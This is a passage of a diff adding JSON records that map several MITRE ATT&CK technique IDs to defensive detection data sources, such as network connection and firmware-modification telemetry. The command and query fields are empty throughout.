"data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null + ] + }, + { + "technique_id": "T1542.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1602.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1602", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + 